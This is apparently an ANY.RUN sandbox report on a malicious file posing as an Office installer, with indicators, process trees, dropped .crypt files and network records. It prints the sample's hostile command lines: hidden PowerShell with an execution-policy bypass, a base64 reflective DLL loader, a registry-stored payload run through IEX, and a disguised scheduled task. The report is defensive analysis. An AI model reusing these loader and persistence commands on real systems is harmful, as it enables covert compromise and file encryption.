File name:

office_setup.exe

Full analysis: https://app.any.run/tasks/9fc69bc2-44c9-4c59-917a-48d4ddb49d4d
Verdict: Malicious activity
Analysis date: June 20, 2025, 07:30:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
upx
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 3 sections
MD5:

726594D76F898F8A82AF8EA1ECE77001

SHA1:

E647D876E1117B316F6765918B6D2F4D23655742

SHA256:

E785D05001343498982226B0B7CDD88F681B15977C7B42EABACCBC28BE1C1872

SSDEEP:

768:6+T919L9Co2lOzecRdx7OwPYn7/PbCp/orSX5h:ZT91REczx7OwQnTNr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 2632)
      • powershell.exe (PID: 4580)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1296)
      • wscript.exe (PID: 4412)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 2632)

    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 4412)

    • Gets %appdata% folder path (SCRIPT)

      • wscript.exe (PID: 4412)

    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 4412)

    • Uses base64 encoding (SCRIPT)

      • wscript.exe (PID: 4412)

    • Detects the decoding of a binary file from Base64 (SCRIPT)

      • wscript.exe (PID: 4412)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 4412)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 4412)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2632)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 5908)

  • SUSPICIOUS

    • Reads the date of Windows installation

      • office_setup.exe (PID: 4892)

    • Reads security settings of Internet Explorer

      • office_setup.exe (PID: 4892)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1296)
      • wscript.exe (PID: 4412)

    • Starts CMD.EXE for commands execution

      • office_setup.exe (PID: 4892)
      • powershell.exe (PID: 7060)

    • The process executes Powershell scripts

      • cmd.exe (PID: 1296)

    • The process executes VB scripts

      • cmd.exe (PID: 3288)

    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 4412)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 4412)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 4412)

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 4412)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 4412)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 4412)

    • Executable content was dropped or overwritten

      • wscript.exe (PID: 4412)

    • Sets XML DOM element text (SCRIPT)

      • wscript.exe (PID: 4412)

    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 4412)

    • BASE64 encoded PowerShell command has been detected

      • wscript.exe (PID: 4412)

    • Creates XML DOM element (SCRIPT)

      • wscript.exe (PID: 4412)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4580)

    • The process executes via Task Scheduler

      • powershell.exe (PID: 4580)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 4580)

    • Executes script without checking the security policy

      • powershell.exe (PID: 4580)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4412)

  • INFO

    • Reads the computer name

      • office_setup.exe (PID: 4892)

    • Checks supported languages

      • office_setup.exe (PID: 4892)

    • Creates files or folders in the user directory

      • office_setup.exe (PID: 4892)

    • Create files in a temporary directory

      • office_setup.exe (PID: 4892)

    • Process checks computer location settings

      • office_setup.exe (PID: 4892)

    • UPX packer has been detected

      • office_setup.exe (PID: 4892)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 4580)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4580)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • wscript.exe (PID: 4412)
      • office_setup.exe (PID: 4892)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7060)

    • Launching a file from Task Scheduler

      • cmd.exe (PID: 5908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (87.1)
.exe | Generic Win/DOS Executable (6.4)
.exe | DOS Executable Generic (6.4)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:03:21 12:06:45+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, No debug
PEType: PE32+
LinkerVersion: 2.42
CodeSize: 28672
InitializedDataSize: 4096
UninitializedDataSize: 73728
EntryPoint: 0x19b10
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
16
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start office_setup.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe powershell.exe no specs conhost.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs schtasks.exe no specs powershell.exe no specs conhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1296"C:\Windows\System32\cmd.exe" /c powershell -Exec Bypass -W hidden -File "C:\Users\admin\k46pgX\TempError.ps1"C:\Windows\System32\cmd.exeoffice_setup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1896\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2144C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2632"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -w hidden -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwATQBpAGMAcgBvAHMAbwBmAHQAXABOAHgARABlAGIAdQBnAC4AZABsAGwAIgApADsAIABbAFAAcgBvAGcAcgBhAG0AXQA6ADoATQBhAGkAbgAoACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3288"C:\Windows\System32\cmd.exe" /c wscript "C:\Users\admin\AppData\Local\Temp\UERJLV\xSTG02f.vbs"C:\Windows\System32\cmd.exeoffice_setup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3460SCHTASKS /Run /TN MicrosoftLogsTaskC:\Windows\System32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3724\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4412wscript "C:\Users\admin\AppData\Local\Temp\UERJLV\xSTG02f.vbs"C:\Windows\System32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
4580"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" -NoP -W Hidden -C "try { $data = (gp -Path HKCU:\SOFTWARE\Microsoft -Name Debug -ErrorAction Stop).Debug; $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($data)); IEX $decoded } catch {}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
4804\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 249
Read events
14 196
Write events
1
Delete events
52

Modification events

(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup\Installed Components
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Active Setup
Operation:delete keyName:(default)
Value:
(PID) Process:(7060) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
Operation:delete keyName:(default)
Value:
Executable files
1
Suspicious files
12
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
7060powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f4k2v5s5.y0d.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4892office_setup.exeC:\Users\admin\k46pgX\TempError.ps1text
MD5:EA92DA282736F9DB5EBC9AAADE2830D4
SHA256:DDAFDBA0E2C16E62ACB25C8A606EAF5A1881CB4673A540A9892564B28A864FEA
2632powershell.exeC:\Users\admin\Desktop\desktop.ini.cryptbinary
MD5:3ACA43F62E797951547C581F5E8663F5
SHA256:B76B8D1AB334D57AF268A083CD8D827BEE110B5530F3EE895CF2AFF8671D4A53
2632powershell.exeC:\Users\admin\Desktop\breakcurrently.rtf.cryptbinary
MD5:6E41DC5FA0B9F1B491EF33ACEB01D5C4
SHA256:FC4205DB1CDA1152A7BE5D9D9740A610691B41BBD31ECEC2C09A709DBAD8F173
2632powershell.exeC:\Users\admin\Desktop\buttonunderstand.rtf.cryptbinary
MD5:05FFECA8651E0D1E18443A0F9532CD2B
SHA256:6B7FC5DFA4EF14B03F613BCC701FC3AE6DD3B782005ED1F8D8B49E4D55D539E7
2632powershell.exeC:\Users\admin\Desktop\newsletteraccording.png.cryptbinary
MD5:E558EE4DD7B1BA6E260B8D2A8ED140AD
SHA256:31BD5E02A9A1C79C7F509642E791E9FD8A87CAA381D293DB1D2CB874E5A30105
2632powershell.exeC:\Users\admin\Desktop\advertisingvillage.rtf.cryptbinary
MD5:2D1A9DF1F85776955C828055ED8B736E
SHA256:AB54CA6B334B7F6D287833AD0DF16B0E4AC48943B3AEEDB4DA1931351882F44B
2632powershell.exeC:\Users\admin\Desktop\indexmost.rtf.cryptbinary
MD5:C33D63F7FA81DBB273CF158F07C0EC7E
SHA256:1F7B02E5DBD78B50DB41F84FFC01A5BE5E5A29F19B7145E1A728F0A8104B0B36
2632powershell.exeC:\Users\admin\Desktop\opportunitypresident.png.cryptbinary
MD5:F916860AA70C30042BE1A9F23D3E446C
SHA256:604A20B5FC08D3C28E06CCD7C4AE47A88A8CB4885F30796427422C4EF2151AB3
2632powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xo1thqtg.vd5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
21
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1268
svchost.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5424
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5424
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5012
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4816
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5424
SIHClient.exe
52.149.20.212:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5424
SIHClient.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
whitelisted
google.com
  • 142.250.184.206
whitelisted
microsoft-office.microsoftoffice365microsoft.com
unknown
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
login.live.com
  • 40.126.31.130
  • 20.190.159.23
  • 20.190.159.2
  • 40.126.31.73
  • 20.190.159.75
  • 40.126.31.0
  • 40.126.31.67
  • 20.190.159.4
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
office_setup.exe